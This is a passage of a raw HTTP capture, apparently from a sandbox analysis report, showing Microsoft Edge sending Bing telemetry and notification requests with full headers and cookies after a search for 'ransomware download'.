x-cdn-traceid: 0.98777b5c.1709220753.b327a3b
-
GEThttps://www.bing.com/aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0msedge.exeRemote address:92.123.128.152:443RequestGET /aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 1
content-type: text/html
content-encoding: br
expires: -1
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a39188824d97a5a6593351939a19
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-SEpQRScui/Mhztv9VwBMrG3lr14ietixaY5qBxzKI74='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: DA133D10B3794AAFB713673B54E356CB Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327b87
-
GEThttps://www.bing.com/aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0msedge.exeRemote address:92.123.128.152:443RequestGET /aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 77A113C6FBE746A88A3BD211FDD80552 Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd2
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8A8C06539BC740F1830460907DEC5E27 Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd5
-
GEThttps://www.bing.com/notifications/handle?action=1&nid=63245&view=BottomBanner_NoTitleRejectBtn&vertical=serpmsedge.exeRemote address:92.123.128.152:443RequestGET /notifications/handle?action=1&nid=63245&view=BottomBanner_NoTitleRejectBtn&vertical=serp HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: BCP=AD=1&AL=1&SM=1
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7722CE4CEECB4F139BCE20E7FC87A46D Ref B: LON04EDGE0713 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd6
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750496%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750585%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750586%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22AllowAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22BnpClick%22%2C%22FID%22%3A%22Bnp%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750968%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750496%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750585%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750586%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22AllowAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22BnpClick%22%2C%22FID%22%3A%22Bnp%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750968%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BFE2647518364B2E8C77D9E9539E20C6 Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd4
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750969%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750969%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
cookie: BCP=AD=1&AL=1&SM=1
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=2&HV=1709220751&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9BB0EF9C74444CCEBE2C308F78EDC3ED Ref B: LTSEDGE0821 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327cd3
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220750971%2C%22Name%22%3A%22AnimationLoad%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220750971%2C%22Name%22%3A%22AnimationLoad%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
